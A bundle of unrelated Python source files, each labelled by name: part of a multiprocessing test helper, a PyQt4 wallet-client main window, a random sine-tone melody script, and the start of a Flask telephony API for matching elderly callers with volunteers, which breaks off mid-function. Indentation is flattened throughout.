Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
if type_ == 'manager':
Temp = hashlib_helper.requires_hashdigest('md5')(Temp)
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
mainwindow.py
|
# -*- coding: utf-8 -*-
# @Time : 2017/12/8
# @Author : Shu
# @Email : httpservlet@yeah.net
# coding=utf-8
import os
import datetime
import sys
import math
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from FormUI.ui_mainwindow import Ui_bwalletMW
from Forms.create_wallet import CreateWalletDialog
from Forms.title import TitleWidget
from Forms.content import ContentWidget
from Forms.contextmenu import FileMenu, WalletMenu, ViewMenu, ToolsMenu, HelpMenu
from Forms.mengban_setting import SettingtWidget
from Forms.mengban_seed import SeedWidget
from Forms.mengban_password import PasswordWidget
from Forms.system_tray import MySystemTrayIcon
from uwallet.main import main
from Forms.thread_commands import CommandsWalker
class BwalletMainWindow(QMainWindow, Ui_bwalletMW):
def __init__(self, trans):
"""
:param trans: 语言设置. 一个dict, 包含自定义翻译, 以及系统菜单翻译
"""
super(BwalletMainWindow, self).__init__()
self.setupUi(self)
self.setMinimumSize(QSize(800, 530))
# 无边框移动相关属性
self.mouse_press_status = False
self.startPos = self.pos()
# 无边框窗体使用系统系统函数最大化以后,会遮盖任务栏
# 自己重写此功能
self.ismaxsize = False # 标志窗口是否最大化
self.geo = self.geometry()
# trans把两个语言翻译传入进来, 使得运行后还能删除刚开始设置的语言设置
self.qt_tr = trans.get('qt_tr')
self.translator = trans.get('translator')
self.setWindowFlags(Qt.FramelessWindowHint) # 设置无边框
self.setAttribute(Qt.WA_TranslucentBackground,True)
#self.setStyleSheet("background-color:#2C3E50;")
# self.setWindowOpacity(0.5) # 设置透明 (0~1),1为不透明
# 布局
self.title_widget = TitleWidget(self)
self.content_widget = ContentWidget(self)
main_layout = QVBoxLayout()
main_layout.addWidget(self.title_widget)
main_layout.addWidget(self.content_widget)
main_layout.setSpacing(0)
main_layout.setContentsMargins(0, 0, 0, 0)
self.centralwidget.setLayout(main_layout)
button_list = [self.title_widget.tbt_history, self.title_widget.tbt_send, self.title_widget.tbt_receive,
self.title_widget.tbt_addresses]
signal_mapper = QSignalMapper(self)
for i, button in enumerate(button_list):
button.clicked.connect(signal_mapper.map)
signal_mapper.setMapping(button, i)
signal_mapper.mapped.connect(self.slot_turn_page)
# 去除状态没有了缩放效果(QSizeGrip[状态栏自带]可用于自定义缩放)
self.size_grip = QSizeGrip(self)
self.size_grip.resize(20, 20)
# 设置缩放控件透明度
opacityEffect = QGraphicsOpacityEffect()
self.size_grip.setGraphicsEffect(opacityEffect)
opacityEffect.setOpacity(0.7)
# 自定义菜单栏
self.button_list = [self.title_widget.btn_file, self.title_widget.btn_wallet, self.title_widget.btn_view,
self.title_widget.btn_tools, self.title_widget.btn_help]
signal_mapper = QSignalMapper(self)
for i, button in enumerate(self.button_list):
# 其实不需要这么复杂, 直接使用QPushButton.setMenu()就可以
# http://blog.csdn.net/u011417605/article/details/51218493
button.clicked.connect(signal_mapper.map)
signal_mapper.setMapping(button, i)
signal_mapper.mapped.connect(self.slot_menu_bar)
self.title_widget.btn_close.clicked.connect(self.close)
self.title_widget.btn_min.clicked.connect(self.slot_minimize)
self.title_widget.btn_max.clicked.connect(self.slot_maximize)
self.title_widget.btn_setting.clicked.connect(self.slot_settings)
self.title_widget.btn_seed.clicked.connect(self.slot_getseed)
self.title_widget.btn_password.clicked.connect(self.slot_password)
self.init_systemtray()
self.command_walker = CommandsWalker(interval=3, filter_1='--receiving', parent=self)
self.connect(self.command_walker, SIGNAL('daemon'), self.slot_check_daemon, Qt.AutoConnection)
self.connect(self.command_walker, SIGNAL('address'), self.slot_address, Qt.AutoConnection)
self.connect(self.command_walker, SIGNAL('history'), self.slot_history, Qt.AutoConnection)
self.connect(self.command_walker, SIGNAL('balance'), self.slot_balance, Qt.AutoConnection)
self.title_widget.btn_file.setVisible(False)
self.title_widget.btn_wallet.setVisible(False)
self.title_widget.btn_view.setVisible(False)
self.title_widget.btn_tools.setVisible(False)
self.title_widget.btn_help.setVisible(False)
self.setWindowIcon(QIcon(":/images/ico"))
QTimer.singleShot(0, self.init_check)
#langindx = self.read_language_conf()
# lang = 'zh_CN'
# if langindx =='0':
# lang ='en_US'
# self.qt_tr = QTranslator()
# if self.qt_tr.load(':/qm/qt_{}.qm'.format(lang)):
# QApplication.installTranslator(self.qt_tr)
#
# self.translator = QTranslator()
# if self.translator.load(':/qm/{}'.format(lang)):
# QApplication.installTranslator(self.translator)
################################## 初始化相关 ##################################
def paintEvent(self,event):
m = 1
path = QPainterPath()
path.setFillRule(Qt.WindingFill)
path.addRect(m, m, self.width()-m*2, self.height()-m*2)
painter = QPainter(self)
#painter.drawLine(QLineF)
#painter.setRenderHint(QPainter.Antialiasing, True)
painter.fillPath(path, QBrush(Qt.white))
color = QColor(100, 100, 100, 30)
#for(int i=0; i<10; i++)
for i in range(m):
path = QPainterPath()
path.setFillRule(Qt.WindingFill)
path.addRoundRect(m-i, m-i, self.width()-(m-i)*2, self.height()-(m-i)*2,1,1)
color.setAlpha(90 - math.sqrt(i)*30)
painter.setPen(QPen(color,1,Qt.SolidLine))
painter.drawRoundRect(QRect(m-i, m-i, self.width()-(m-i)*2, self.height()-(m-i)*2), 0,0)
# path = QPainterPath()
# path.setFillRule(Qt.WindingFill)
# path.addRect(m-i, m-i, self.width()-(m-i)*2, self.height()-(m-i)*2)
# color.setAlpha(90 - math.sqrt(i)*30)
# painter.setPen(QPen(color,1))
# painter.drawPath(path
def init_check(self):
"""初始化主窗口时, 检查钱包是否存在"""
if not self.bwallet_main('haswallet', '--client'): # 如果没有钱包
self.hide()
create_dialog = CreateWalletDialog(self)
create_dialog.show()
else:
QTimer.singleShot(0, self.init_daemon)
def init_systemtray(self):
""" 初始化托盘图标 """
self.tray = MySystemTrayIcon(self)
self.tray.setIcon(QIcon(":/images/ico"))
self.tray.setToolTip(self.tr(u"UWallet client"))
self.tray.activated.connect(self.slot_systemtray)
self.tray.show()
def init_daemon(self):
"""启动daemon"""
# daemon不能在线程中启动, 不然各种奇怪的问题, 比如修改密码
self.bwallet_main('daemon', 'start', '--client')
# import multiprocessing
# sys.argv=sys.argv[:1]
# sys.argv.append('daemon')
# sys.argv.append('start')
# multiprocessing.Process(target=main).start()
self.command_walker.start()
################################## 通用方法 ##################################
def bwallet_main(self, *args, **kwargs):
""" 因为钱包的各种命令是线程不安全的, 所以为了安全的执行某条命令
在执行的时候, 最好是停止其他执行线程
kwargs: 会传入 thread_safe=True
表明需要先停止线程, 执行命令, 然后再启动线程
"""
thread_safe = kwargs.get('thread_safe')
sys.argv = sys.argv[:1]
for arg in args:
sys.argv.append(arg)
if thread_safe is True:
if self.command_walker.isRunning():
self.command_walker.stop()
self.command_walker.wait()
rs = main()
if thread_safe is True:
self.command_walker.start()
while True:
# 防止两次停止/启动间隔太近,导致阻塞的问题
# 第二次停止调用stop时,设置stopped为True,有可能在第一次线程运行initialize之前
# 此时:initialize后运行, isStopped就为False,线程就不会退出
# 导致stopped一直是False, wait就一直处于阻塞状态
if self.command_walker.isStopped() == False:
break
return rs
def is_title(self, xPos, yPos):
size = self.size()
x = size.width()
y = size.height()
return yPos < 30 and xPos < x - 120
def set_size(self):
"""mainwindow改变大小时, 修改其子控件大小"""
self.title_widget.setGeometry(0, 0, self.width(), 87)
self.content_widget.setGeometry(0, 87, self.width(), self.height() - 87)
self.set_grip_size()
self.set_mengban_size()
def set_grip_size(self):
"""设置缩放按钮到主程序的右下角(default:左上角)"""
self.size_grip.setGeometry(self.width() - 20, self.height() - 20, 20, 20)
def set_mengban_size(self, widget=None):
"""设置setting面板缩放操作, 以及缩放按钮置顶"""
if isinstance(widget, QWidget):
widget.setGeometry(0, 35, self.width() - 2, self.height() - 35 - 2) # 35的y是要让最大化, 最小化, 关闭按钮可以点击
else:
if hasattr(self, 'setting') and isinstance(self.setting, QWidget) and self.setting.isVisible():
self.setting.setGeometry(0, 35, self.width() - 2, self.height() - 35 - 2)
elif hasattr(self, 'getseed') and isinstance(self.getseed, QWidget) and self.getseed.isVisible():
self.getseed.setGeometry(0, 35, self.width() - 2, self.height() - 35 - 2)
elif hasattr(self, 'password') and isinstance(self.password, QWidget) and self.password.isVisible():
self.password.setGeometry(0, 35, self.width() - 2, self.height() - 35 - 2)
self.size_grip.raise_() # 让右下角缩放小图标位于所有控件之上
def stop_daemon(self):
"""停止daemon服务"""
self.bwallet_main('daemon', 'stop', '--client')
def read_language_conf(self):
langPath = os.path.abspath('.') + '\language.txt'
if not os.path.exists(langPath):
f=file(langPath, "w+")
f.write('1')
f.close()
file_object = open(langPath, "r")
lang = file_object.read( )
file_object.close( )
return lang
def write_language_conf(self,lang):
try:
langPath = os.path.abspath('.') + '\language.txt'
if not os.path.exists(langPath):
f=file(langPath, "w+")
f.write(lang)
f.close()
else:
file_object = open(langPath, "w+")
file_object.write(lang)
file_object.close( )
except Exception,e:
print e
################################## 槽函数 ##################################
def slot_change_lang(self, index):
"""设置语言槽函数"""
index = str(index)
lang = ''
if index == '0':
lang = 'en_US'
elif index == '1':
lang = 'zh_CN'
#self.write_language_conf(index)
# 每次设置语言之前, 删掉上一次设置的语言
if isinstance(self.qt_tr, QTranslator):
QApplication.removeTranslator(self.qt_tr)
if isinstance(self.translator, QTranslator):
QApplication.removeTranslator(self.translator)
self.qt_tr = QTranslator()
if self.qt_tr.load(':/qm/qt_{}.qm'.format(lang)):
QApplication.installTranslator(self.qt_tr)
self.translator = QTranslator()
if self.translator.load(':/qm/{}'.format(lang)):
QApplication.installTranslator(self.translator)
self.retranslateUi(self)
self.title_widget.retranslateUi(self.title_widget)
self.content_widget.retranslateUi(self.content_widget)
self.content_widget.custom_retranslateUi()
self.setting.retranslateUi(self.setting)
if hasattr(self, 'getseed'):
self.getseed.retranslateUi(self.getseed)
if hasattr(self, 'password'):
self.password.retranslateUi(self.password)
self.tray.retranslateUi()
def slot_minimize(self):
self.showMinimized()
def slot_maximize(self):
if self.ismaxsize:
self.setGeometry(self.geo)
self.ismaxsize = False
else:
self.geo = self.geometry()
self.setGeometry(QApplication.desktop().availableGeometry())
self.ismaxsize = True
def slot_turn_page(self, current_index):
self.content_widget.stackedWidget.setCurrentIndex(current_index + 1)
def slot_menu_bar(self, current_index):
p = self.mapToGlobal(QPoint()) # 找到主窗口的全局坐标
wd = self.button_list[current_index].geometry() # 获取菜单按钮的位置以及大小
file_menu = FileMenu(self)
wallet_menu = WalletMenu(self)
view_menu = ViewMenu(self)
tools_menu = ToolsMenu(self)
help_menu = HelpMenu(self)
menu_list = [file_menu, wallet_menu, view_menu, tools_menu, help_menu]
menu = menu_list[current_index]
menu.exec_(QPoint(p.x() + wd.x(), p.y() + 87))
def slot_settings(self):
if not (hasattr(self, 'setting') and isinstance(self.setting, QWidget)):
self.setting = SettingtWidget(self)
self.setting.btn_setting_appearance_close.clicked.connect(self.setting.close)
self.setting.cbx_setting_appearance_language.currentIndexChanged.connect(self.slot_change_lang)
if not self.setting.isVisible():
self.setting.show()
lang = unicode(QLocale.system().name())
# if lang == 'zh_CN':
# self.setting.cbx_setting_appearance_language.setCurrentIndex(1)
# else:
# self.setting.cbx_setting_appearance_language.setCurrentIndex(0)
self.setting.btn_setting_appearance_close.setFocus(True)
# self.setting.btn_setting_appearance_close.setShortcut(QKeySequence.InsertParagraphSeparator)
# self.setting.btn_setting_appearance_close.setShortcut(Qt.Key_Enter | Qt.Key_Return)
self.set_mengban_size(self.setting)
def slot_getseed(self):
if not (hasattr(self, 'getseed') and isinstance(self.getseed, QWidget)):
self.getseed = SeedWidget(self)
self.getseed.btn_seed_close.clicked.connect(self.getseed.close)
if not self.getseed.isVisible():
self.getseed.show()
self.getseed.led_seed_password.setText('')
is_password = self.bwallet_main('haspassword', '--client', thread_safe=True)
if is_password is True:
self.getseed.ted_setting_getseed.setVisible(False)
self.getseed.led_seed_password.setVisible(True)
self.getseed.btn_seed_password.setVisible(True)
else:
self.getseed.ted_setting_getseed.setVisible(True)
self.getseed.led_seed_password.setVisible(False)
self.getseed.btn_seed_password.setVisible(False)
try:
rs = self.bwallet_main('getseed', '--client', thread_safe=True)
except Exception as e:
print (e)
else:
self.getseed.ted_setting_getseed.setText(rs)
self.set_mengban_size()
def slot_password(self):
if not (hasattr(self, 'password') and isinstance(self.password, QWidget)):
self.password = PasswordWidget(self)
if not self.password.isVisible():
self.password.show()
self.password.led_password_current.setText('')
self.password.led_password_new.setText('')
self.password.led_password_comfirm.setText('')
is_password = self.bwallet_main('haspassword', '--client', thread_safe=True)
if is_password is True:
self.password.lbl_password_current.setVisible(True)
self.password.led_password_current.setVisible(True)
self.password.lbl_password_des.setText(self.tr(
"""Your bnc are password protected. \nHowever, your wallet file is not encrypted. \nUse this dialog to change your passowrd."""))
else:
self.password.lbl_password_current.setVisible(False)
self.password.led_password_current.setVisible(False)
self.password.lbl_password_des.setText(
self.tr("""Your wallet is not protected. \nUse this dialog to add a password to your wallet."""))
self.set_mengban_size()
def slot_systemtray(self, reason):
""" 系统托盘操作的槽函数 """
if reason == QSystemTrayIcon.DoubleClick:
if self.isVisible():
self.hide()
else:
self.show()
def slot_check_daemon(self, status):
"""检查daemon状态的槽函数"""
if status is True:
style = """border-image: url(:/images/greenball);"""
else:
style = """border-image: url(:/images/redball);"""
self.title_widget.btn_network.setStyleSheet(style)
def slot_address(self, listaddresses, cur_addr):
"""绑定address数据"""
# clear发射itemSelectionChanged信号
self.content_widget.twd_addresses.clear()
cur_item = None
for i, addr_balance in enumerate(listaddresses):
ab = addr_balance.split(',')
addr = ab[0].strip()
balance = ab[1].strip()
if balance.endswith('.'):
balance = balance[:-1]
view_list = [addr, balance]
item = QTreeWidgetItem(self.content_widget.twd_addresses, view_list)
item.setData(0, Qt.UserRole, QVariant(addr))
if self.content_widget.led_receiving_address.text().isEmpty():
self.content_widget.led_receiving_address.setText(addr)
if addr == cur_addr:
cur_item = item
if cur_item:
cur_item.setSelected(True)
update_dt = str(datetime.datetime.now()).split('.')[0]
self.content_widget.lbl_address_updatetime.setText(update_dt)
def slot_history(self, historys, cur_txid):
"""绑定history数据"""
self.content_widget.twd_history.clear()
cur_item = None
temps = []
for history in historys:
if not isinstance(history, dict):
# 第一次返回的数据是listaddresses命令的数据, 不知道为什么
return
fee = history.get('fee')
value = history.get('value')
if value < 0:
amount = value + fee
else:
amount = value
dt = history.get('date').strip()
if dt == '----':
dt = self.tr('unconfirmed') # 未确认交易
txid = history.get('txid').strip()
view_list = [dt, str(amount), str(fee)]
item = QTreeWidgetItem(self.content_widget.twd_history, view_list)
item.setData(0, Qt.UserRole, QVariant(txid))
if txid == cur_txid:
cur_item = item
if value >= 0:
item_column_count = range(item.columnCount())
for i in item_column_count:
item.setForeground(i, QBrush(QColor(0, 128, 0, 160)))
if cur_item:
cur_item.setSelected(True)
update_dt = str(datetime.datetime.now()).split('.')[0]
self.content_widget.lbl_history_updatetime.setText(update_dt)
def slot_balance(self, balance):
self.title_widget.lbl_balance.setText(balance)
################################## 重写系统事件 ##################################
def mousePressEvent(self, event):
if event.button() == Qt.LeftButton:
self.mouse_press_status = True
self.startPos = event.globalPos() - self.frameGeometry().topLeft()
def mouseReleaseEvent(self, event):
if event.button() == Qt.LeftButton:
self.mouse_press_status = False
def mouseMoveEvent(self, event):
if not self.ismaxsize:
if event.buttons() == Qt.LeftButton and self.mouse_press_status is True:
self.move(event.globalPos() - self.startPos)
def mouseDoubleClickEvent(self, event):
if event.button() == Qt.LeftButton:
point = self.mapFromGlobal(QCursor().pos())
if self.is_title(point.x(), point.y()):
self.slot_maximize()
def resizeEvent(self, event):
self.set_size()
# def showEvent(self, *args, **kwargs):
# self.slot_change_lang('0')
def closeEvent(self, event):
""" 重写关闭事件 """
# 关闭对应服务
self.tray.hide() # 隐藏托盘图标
# 不用手工关闭, 钱包模块已经实现了干净的关闭daemon线程的操作
self.stop_daemon() # 关闭daemon服务
if self.command_walker.isRunning():
self.command_walker.stop()
self.command_walker.wait()
# self.close()
# self.close()
# sys.exit(0) # 感觉退出更快,不知道有什么隐患没有
# QTimer.singleShot(0, qApp, SLOT("quit()"))
def keyPressEvent(self, event):
""" 按下esc键, 实现与关闭按钮同样的效果 """
if event.key() == Qt.Key_Escape:
if hasattr(self, 'setting') and isinstance(self.setting, QWidget) and self.setting.isVisible():
self.setting.close()
elif hasattr(self, 'getseed') and isinstance(self.getseed, QWidget) and self.getseed.isVisible():
self.getseed.close()
elif hasattr(self, 'password') and isinstance(self.password, QWidget) and self.password.isVisible():
self.password.close()
else:
QMainWindow.keyPressEvent(self, event)
def eventFilter(self, obj, event):
if isinstance(obj, QFrame):
if unicode(obj.objectName()).encode('u8') in ['frame_left', 'frame_top']:
if event.type() == QEvent.MouseButtonPress:
obj.parent().close()
return True
return False
|
test.py
|
import random
import math
from pysine import sine
import multiprocessing
f0 = 440.0
a = math.pow(2, 1/12)
# fn = f0 * a^n
NOTES = [f0 * math.pow(a, x) for x in range(-30, 30, 1)]
MIN_NOTE_LENGTH = 100
MAX_NOTE_LENGTH = 1000
NOTE_LENGTH_STEP = 50
class Note:
def __init__(self, frequency, duration):
self.frequency = frequency
self.duration = duration
def play(self):
sine(frequency=self.frequency, duration=self.duration)
class Phrase:
def __init__(self, length, max_time_length):
self.notes = []
self.length = length
self.max_time_length = max_time_length
self.time_length = 0
self.seed = random.choice(range(3, len(NOTES)-3, 1))
self.note_set = NOTES[self.seed-3:self.seed+4]
def is_full(self):
return self.time_remaining() <= 0
def add_note(self, frequency, duration):
if self.time_remaining() < MIN_NOTE_LENGTH/1000:
new_note_duration = duration + self.time_remaining()
self.notes.append(Note(frequency, new_note_duration))
self.time_length += new_note_duration
elif duration > self.time_remaining():
new_note_duration = self.time_remaining()
self.notes.append(Note(frequency, new_note_duration))
self.time_length += new_note_duration
else:
self.notes.append(Note(frequency, duration))
self.time_length += duration
def play(self):
total = 0.0
for n in self.notes:
n.play()
print("N: {}".format(n.duration))
total += n.duration
print("TOTAL: {}".format(total))
print("END OF PHRASE")
def time_remaining(self):
return self.max_time_length - self.time_length
def pick_note(self):
return random.choice(self.note_set)
NUMBER_OF_PHRASES = 4
PHRASE_LENGTH = range(5, 10, 1)
def play_voice():
phrases = []
for i in range(NUMBER_OF_PHRASES):
phrase = Phrase(random.choice(PHRASE_LENGTH), 5.0)
while not phrase.is_full():
freq = phrase.pick_note()
dur = random.randrange(MIN_NOTE_LENGTH, MAX_NOTE_LENGTH, NOTE_LENGTH_STEP)/1000.0
phrase.add_note(freq, dur)
phrases.append(phrase)
for phrase in phrases:
phrase.play()
if __name__ == '__main__':
multiprocessing.freeze_support()
p = multiprocessing.Process(target=play_voice)
p.start()
play_voice()
p.join()
|
api.py
|
import json
import logging
import os
import random
import secrets
import socket
import string
import threading
import time
import urllib.parse
import uuid
from collections import Counter
from collections import defaultdict
from pprint import pprint
import pandas as pd
import requests
from flask import abort
from flask import Flask
from flask import redirect
from flask import request
from flask import session
from flask import url_for
from flask_session import Session
from .checkMedia import checkPayload
from .databaseIntegration import clearCustomerHelperPairing
from .databaseIntegration import createNewCallHistory
from .databaseIntegration import deleteFromDatabase
from .databaseIntegration import fetchData
from .databaseIntegration import fetchHelper
from .databaseIntegration import readActiveCustomer
from .databaseIntegration import readActiveHelper
from .databaseIntegration import readCallHistory
from .databaseIntegration import readNameByNumber
from .databaseIntegration import readNewConnectionInfo
from .databaseIntegration import readZipcodeFromDatabase
from .databaseIntegration import saveCustomerToDatabase
from .databaseIntegration import saveHelperToDatabase
from .databaseIntegration import userExists
from .databaseIntegration import writeActiveCustomer
from .databaseIntegration import writeActiveHelper
from .databaseIntegration import writeCallHistory
from .databaseIntegration import writeCustomerAnalytics
from .databaseIntegration import writeHelperAnalytics
from .schemas import REGISTRATION_SCHEMA
from .schemas import VERIFICATION_SCHEMA
from .text2speech_utils import generateNameSoundByte
from .zipcode_utils import getCity
from .zipcode_utils import getDistanceApart
from .zipcode_utils import getDistrict
from .zipcode_utils import readZipCodeData
app = Flask(__name__, static_folder="../client/build", static_url_path="/")
SESSION_TYPE = "redis"
SECRET_KEY = os.getenv("SECRET_KEY")
app.config.from_object(__name__)
Session(app)
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
handler = logging.FileHandler("flask.log")
handler.setLevel(logging.INFO)
formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
handler.setFormatter(formatter)
log.addHandler(handler)
startTime = time.strftime("%Y-%m-%d:%H-%M-%S", time.gmtime())
log.info(f"New log entry {startTime}")
BASE_URL = os.getenv("BASE_URL")
ELK_NUMBER = os.getenv("ELK_NUMBER")
API_USERNAME = os.getenv("API_USERNAME")
API_PASSWORD = os.getenv("API_PASSWORD")
DATABASE = os.getenv("DATABASE")
DATABASE_KEY = os.getenv("DATABASE_KEY")
HOOK_URL = os.getenv("HOOK_URL")
def checkEnv(envVar, envStr):
if envVar is None:
print(f"Warning! An environmental variable is not set {envStr}")
log.warning(f"Warning! An environmental variable is not set {envStr}")
# Checks if the environmental variables are set
checkEnv(BASE_URL, "BASE_URL")
checkEnv(ELK_NUMBER, "ELK_NUMBER")
checkEnv(API_USERNAME, "API_USERNAME")
checkEnv(API_PASSWORD, "API_PASSWORD")
checkEnv(DATABASE, "DATABASE")
checkEnv(DATABASE_KEY, "DATABASE_KEY")
checkEnv(SECRET_KEY, "SECRET_KEY")
checkEnv(HOOK_URL, "HOOK_URL")
ZIPDATA = "SE.txt"
MEDIA_URL = "https://files.telehelp.se/sv"
ELK_BASE = "https://api.46elks.com"
VERIFICATION_EXPIRY_TIME = 5 * 60 # 5 minutes
LOCATION_DICT, DISTRICT_DICT, CITY_DICT = readZipCodeData(ZIPDATA)
print("Site phone number: " + ELK_NUMBER)
def canonicalize_number(phone_number):
if phone_number[0] == "0":
phone_number = "+46" + phone_number[1:]
return phone_number
@app.route("/")
def index():
return app.send_static_file("index.html")
# ------------------------------ PHONE API ----------------------------------------------------
@app.route("/api/receiveCall", methods=["POST"])
def receiveCall():
callId = request.form.get("callid")
startTime = time.strftime("%Y-%m-%d:%H-%M-%S", time.gmtime())
telehelpCallId = str(uuid.uuid1())
createNewCallHistory(DATABASE, DATABASE_KEY, callId)
from_sender = request.form.get("from")
print(from_sender)
# For registered helpers
if userExists(DATABASE, DATABASE_KEY, from_sender, "helper"):
print("Registered helper")
writeHelperAnalytics(
DATABASE,
DATABASE_KEY,
telehelpCallId,
["telehelp_callid", "elks_callid", "call_start_time"],
(telehelpCallId, callId, startTime),
)
activeCustomer = readActiveCustomer(DATABASE, DATABASE_KEY, from_sender)
print(activeCustomer)
if activeCustomer is None:
payload = {
"ivr": f"{MEDIA_URL}/ivr/hjalper_ingen.mp3",
"skippable": "true",
"digits": 1,
"2": BASE_URL + "/support",
"1": {
"play": MEDIA_URL + "/ivr/avreg_confirmed.mp3",
"next": BASE_URL + "/api/removeHelper/%s" % telehelpCallId,
},
"next": BASE_URL + "/api/receiveCall",
}
else:
payload = {
"ivr": MEDIA_URL + "/ivr/registrerad_volontar.mp3",
"digits": 1,
"1": BASE_URL + "/api/handleReturningHelper/%s" % telehelpCallId,
"2": {
"play": MEDIA_URL + "/ivr/avreg_confirmed.mp3",
"next": BASE_URL + "/api/removeHelper/%s" % telehelpCallId,
},
"3": BASE_URL + "/api/support",
"next": BASE_URL + "/api/receiveCall",
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
# For registered customers
elif userExists(DATABASE, DATABASE_KEY, from_sender, "customer"):
print("Registered customer")
writeCustomerAnalytics(
DATABASE,
DATABASE_KEY,
telehelpCallId,
["telehelp_callid", "elks_callid", "call_start_time", "new_customer"],
(telehelpCallId, callId, startTime, "False"),
)
# Get name of person to suggest call to from DB
helperNumber = readActiveHelper(DATABASE, DATABASE_KEY, from_sender)
name = readNameByNumber(DATABASE, DATABASE_KEY, helperNumber)
if name is None:
payload = {
"ivr": MEDIA_URL + "/ivr/ensam_gamling.mp3",
"digits": 1,
"1": BASE_URL + "/api/handleLonelyCustomer/%s" % telehelpCallId,
"2": BASE_URL + "/api/removeCustomer",
"3": BASE_URL + "/api/support",
"next": BASE_URL + "/api/receiveCall",
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
else:
nameEncoded = urllib.parse.quote(name) # åäö etc not handled well as URL -> crash
# Make sure name already exists (generate if somehow missing, for example early volunteers)
if not os.path.isfile("/media/name/" + nameEncoded + ".mp3"):
generateNameSoundByte(name)
payload = {
"play": MEDIA_URL + "/ivr/behover_hjalp.mp3",
"next": {
"play": MEDIA_URL + "/name/" + nameEncoded + ".mp3",
"next": {
"ivr": MEDIA_URL + "/ivr/pratade_sist.mp3",
"digits": 1,
"1": BASE_URL + "/api/handleReturningCustomer/%s" % telehelpCallId,
"2": BASE_URL + "/api/handleReturningCustomer/%s" % telehelpCallId,
"3": BASE_URL + "/api/handleReturningCustomer/%s" % telehelpCallId,
"4": BASE_URL + "/api/support",
"next": BASE_URL + "/api/receiveCall",
},
},
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
# New customer
writeCustomerAnalytics(
DATABASE,
DATABASE_KEY,
telehelpCallId,
["telehelp_callid", "elks_callid", "call_start_time", "new_customer"],
(telehelpCallId, callId, startTime, "True"),
)
payload = {
"ivr": MEDIA_URL + "/ivr/info.mp3",
"skippable": "true",
"digits": 1,
"1": BASE_URL + "/api/handleNumberInput/%s" % telehelpCallId,
"2": BASE_URL + "/api/receiveCall",
"3": BASE_URL + "/api/support",
"next": BASE_URL + "/api/receiveCall",
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
@app.route("/api/customerHangup/<string:telehelpCallId>", methods=["POST", "GET"])
def customerHangup(telehelpCallId):
print("hangup")
endTime = time.strftime("%Y-%m-%d:%H-%M-%S", time.gmtime())
writeCustomerAnalytics(
DATABASE, DATABASE_KEY, telehelpCallId, ["call_end_time"], (endTime, telehelpCallId)
)
return ""
@app.route("/api/helperHangup/<string:telehelpCallId>", methods=["POST", "GET"])
def helperHangup(telehelpCallId):
print("hangup")
endTime = time.strftime("%Y-%m-%d:%H-%M-%S", time.gmtime())
writeHelperAnalytics(DATABASE, DATABASE_KEY, telehelpCallId, ["call_end_time"], (endTime, telehelpCallId))
return ""
@app.route("/api/handleReturningHelper/<string:telehelpCallId>", methods=["POST"])
def handleReturningHelper(telehelpCallId):
print(request.form.get("result"))
number = int(request.form.get("result"))
if number == 1:
writeHelperAnalytics(
DATABASE,
DATABASE_KEY,
telehelpCallId,
["contacted_prev_customer", "deregistered"],
("True", "False", telehelpCallId),
)
payload = {
"play": MEDIA_URL + "/ivr/du_kopplas.mp3",
"next": BASE_URL + "/api/callExistingCustomer/%s" % telehelpCallId,
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
elif number == 2:
payload = {
"play": MEDIA_URL + "/ivr/avreg_confirmed.mp3",
"next": BASE_URL + "/api/removeHelper/%s" % telehelpCallId,
}
checkPayload(payload, MEDIA_URL, log=log)
